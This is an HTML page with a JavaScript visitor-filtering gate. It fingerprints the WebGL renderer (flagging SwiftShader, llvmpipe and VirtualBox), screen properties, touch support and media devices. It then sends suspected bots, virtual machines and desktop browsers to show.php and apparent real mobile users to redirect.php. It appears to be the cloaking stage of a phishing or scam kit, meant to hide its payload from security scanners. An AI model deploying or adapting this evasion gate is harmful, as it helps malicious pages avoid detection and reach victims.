<html>



<html>

<head>





<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">





</head>



<body>



<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.min.js"></script>







<script>



var canvas = document.createElement("canvas");

var gl = canvas.getContext("webgl");

var debugInfo = gl.getExtension("WEBGL_debug_renderer_info");

var renderer = gl.getParameter(debugInfo.UNMASKED_RENDERER_WEBGL);

var width = screen.width;

var height = screen.height;

var color_depth = screen.colorDepth;



var block = 0;







if (/swiftshader/i.test(renderer.toLowerCase()) || /llvmpipe/i.test(renderer.toLowerCase()) || /virtualbox/i.test(renderer.toLowerCase()) || !renderer) {



console.log("Bot.");



var block = 1;



}





else if (color_depth < 24 || width < 100 || height < 100 || !color_depth) {





console.log("BOT.");



var block = 2;



} 







var isMobile = ('ontouchstart' in document.documentElement && navigator.userAgent.match(/Mobi/));



if (isMobile === false) {



console.log("Bot.");



var block = 4;



}











if (navigator.maxTouchPoints < 1 || navigator.maxTouchPoints == "undefined" ) {

  

console.log("Bot Detected");

 

var block = 30;

  

  

}







if (block == 0) 



{

navigator.mediaDevices.enumerateDevices()

.then(devices => {

var a1 = devices.filter(d => d.kind === 'audioinput');

var v1 = devices.filter(d => d.kind === 'videoinput');

if (v1.length < 1 && a1.length < 1)

{

document.cookie="banned=1";

window.location="show.php";  

}

else

{

document.cookie="x10=ok"; 

window.location="redirect.php"; 

}

});



}

else if (block != 0) 

{

document.cookie="banned=1";

window.location="show.php"; 

}



</script>



</body>



</html>




